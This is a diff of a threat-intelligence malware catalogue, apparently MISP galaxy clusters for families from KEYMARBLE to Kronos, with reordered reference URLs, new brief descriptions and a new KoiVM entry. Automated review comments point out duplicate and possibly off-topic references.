- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-221A",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://research.checkpoint.com/north-korea-turns-against-russian-targets/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://research.checkpoint.com/north-korea-turns-against-russian-targets/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f7f53bb8-37ed-4bbe-9809-ca1594431536",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
"value": "KEYMARBLE"
},
@@ -28530,11 +30111,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.khonsari",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/",
+ "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/",
"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/"
+ "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [],
"type": []
@@ -28543,27 +30124,18 @@
"value": "Khonsari"
},
{
- "description": "",
+ "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
+ "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "72b702d9-43c3-40b9-b004-8d0671225fb8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
"value": "KHRAT"
},
@@ -28595,19 +30167,18 @@
"value": "KillAV"
},
{
- "description": "",
+ "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
"https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt",
- "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://attack.mitre.org/groups/G0034",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/",
- "https://www.secureworks.com/research/threat-profiles/iron-viking"
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
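Review bot: The refs list now contains the same welivesecurity article twice, `http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/` and the same URL without the trailing slash; the generator should normalise URLs before de-duplicating, and one of the two should go. Two previously listed sources are also dropped without explanation, the welivesecurity Lazarus casino KillDisk article and the Trend Micro Latin America variant post, both of which are directly about KillDisk variants; please confirm that was intended upstream rather than a refs-merge bug. Minor: the new description ends in a trailing space after "between them."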
@@ -28638,15 +30209,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "3160f772-d458-4bff-970c-1c0431238803",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "61edd17b-322d-45dc-a6a0-31c13ec2338e",
"value": "KimJongRat"
},
@@ -28655,19 +30217,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
"https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
"https://asec.ahnlab.com/en/37396/",
- "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
- "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
"https://blog.alyac.co.kr/2347",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
- "https://asec.ahnlab.com/en/30532/"
+ "https://asec.ahnlab.com/en/30532/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign",
+ "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html"
],
"synonyms": [],
"type": []
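Review bot: Two of the newly added refs, `https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html` and `https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html`, read from their paths as general persistence-technique tutorials rather than Kimsuky-specific reporting; the same applies to the three cocomelonc URLs added in the Konni hunk below. Please confirm they actually describe this family before they are shipped as cluster references, since downstream users treat the refs list as source material for the family.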
@@ -28680,25 +30245,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer",
- "https://news.sophos.com/en-us/2020/06/09/kingminer-report/",
- "https://asec.ahnlab.com/en/32572/",
"https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf",
- "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
+ "https://news.sophos.com/en-us/2020/06/09/kingminer-report/",
+ "https://asec.ahnlab.com/en/32572/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a9467439-48d8-4f68-9519-560bb6430f0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "04d95343-fd44-471d-bfe7-908994a98ea7",
"value": "Kingminer"
},
@@ -28707,9 +30263,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
- "https://github.com/nyx0/KINS",
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
+ "https://github.com/nyx0/KINS",
"https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/"
],
"synonyms": [
@@ -28727,8 +30283,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars",
"https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt"
],
"synonyms": [],
"type": []
@@ -28782,8 +30338,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html"
+ "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
],
"synonyms": [],
"type": []
@@ -28805,38 +30361,42 @@
"value": "Knot"
},
{
- "description": "",
+ "description": "Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://blog.tofile.dev/2020/11/28/koadic_jarm.html",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
"https://github.com/zerosum0x0/koadic",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf"
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://blog.tofile.dev/2020/11/28/koadic_jarm.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f9e0b922-253c-40fa-a6d2-e60ec9c6980b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
"value": "Koadic"
},
+ {
+ "description": "A loader written in .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koivm",
+ "https://labs.k7computing.com/index.php/koivm-loader-resurfaces-with-a-bang/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4b7c6af1-1980-452f-9405-e42d0066ff2d",
+ "value": "KoiVM"
+ },
{
"description": "",
"meta": {
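Review bot: The Koadic refs list still carries both `http://` and `https://` versions of the same two Secureworks profiles (`.../threat-profiles/cobalt-ulster` and `.../threat-profiles/gold-drake`); this predates the change, but since the list is being regenerated anyway, scheme-normalising URLs before de-duplication would remove both pairs. For the new KoiVM cluster, the description "A loader written in .NET." is thinner than the other new descriptions in this patch (which cite their source); a sentence derived from the K7 write-up that is already listed as a ref would make the entry more useful, and `synonyms`/`type` are left empty as with the other new entries.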
@@ -28855,10 +30415,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
- "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99"
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
+ "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
],
"synonyms": [
"Splinter RAT"
@@ -28873,35 +30433,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
- "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
- "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/",
"https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
- "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
- "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
- "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
"https://blog.alyac.co.kr/2474",
- "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
- "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
- "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf",
- "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/",
- "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
+ "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-227a"
+ "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
+ "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf",
+ "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-227a",
+ "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
+ "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
+ "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
+ "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
+ "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "24ee55e3-697f-482f-8fa8-d05999df40cd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
"value": "Konni"
},
@@ -28923,26 +30477,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
- "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
- "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
- "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
- "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
"https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
- "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
- "https://asec.ahnlab.com/1298",
- "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.youtube.com/watch?v=_fstHQSK-kk"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
+ "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
+ "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
+ "https://www.youtube.com/watch?v=_fstHQSK-kk",
+ "https://asec.ahnlab.com/1298",
+ "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
+ "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/"
],
"synonyms": [
"Bisonal"
@@ -28957,17 +30511,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://0xchrollo.github.io/articles/unpacking-kovter-malware/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md",
- "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
- "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless",
"https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
"https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless"
+ "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md",
+ "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://0xchrollo.github.io/articles/unpacking-kovter-malware/",
+ "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a"
],
"synonyms": [],
"type": []
@@ -28980,19 +30534,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://isc.sans.edu/diary/26010",
- "https://news.drweb.com/show/?i=13242&lng=en",
- "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
- "https://isc.sans.edu/diary/25934",
- "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
- "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
+ "https://isc.sans.edu/diary/26010",
+ "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
"https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://isc.sans.edu/diary/25934",
"https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
+ "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
"https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://news.drweb.com/show/?i=13242&lng=en"
],
"synonyms": [
"Khalesi",
@@ -29021,10 +30575,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/",
"https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.recordedfuture.com/kraken-cryptor-ransomware/",
"https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/",
- "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+ "https://www.recordedfuture.com/kraken-cryptor-ransomware/"
],
"synonyms": [],
"type": []
@@ -29033,13 +30587,14 @@
"value": "Kraken"
},
{
- "description": "",
+ "description": "ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
- "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
- "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
+ "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/",
+ "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
+ "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
"https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan"
],
"synonyms": [
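Review bot: The new KRBanker description ends with a literal `\r\n\r\n`, which is copied-over whitespace from the source text rather than content; strip trailing whitespace from descriptions in the generator so rendered output (HTML galaxy page, MISP UI) does not get stray blank lines. The attribution to ThreatPost in the text is good; consider also adding the ThreatPost article itself to the refs list, since none of the listed refs is the quoted source.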
@@ -29067,25 +30622,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
- "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
- "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
- "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
- "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
- "https://twitter.com/3xp0rtblog/status/1294157781415743488",
